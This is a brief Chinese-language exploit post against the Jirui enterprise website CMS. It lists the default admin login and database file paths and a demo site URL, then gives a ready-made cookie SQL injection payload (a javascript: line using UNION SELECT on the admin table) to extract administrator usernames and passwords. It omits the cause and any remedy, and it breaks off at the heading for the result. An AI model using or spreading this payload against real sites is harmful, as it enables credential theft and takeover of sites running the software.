极瑞企业网站系统cookie 注入漏洞

极瑞企业网站系统是为中小型企业专门定制的小型企业站源代码，代码全部免费公开，可以自行修改学习使用，但严禁用于商业用途。系

统前台界面清洁简单，后台功能强大，最适合企业展示型的网站。

默认后台:admin/login.asp
默认数据库:database/%23zhiyuan_date_1003.mdb
官方演示站：http://www.li07.com/demo/01/

漏洞：cookie注入 成因略。


EXP:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,admin,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin"));

注入点测试:
http://www.li07.com/demo/01/products.asp?id=1

效果: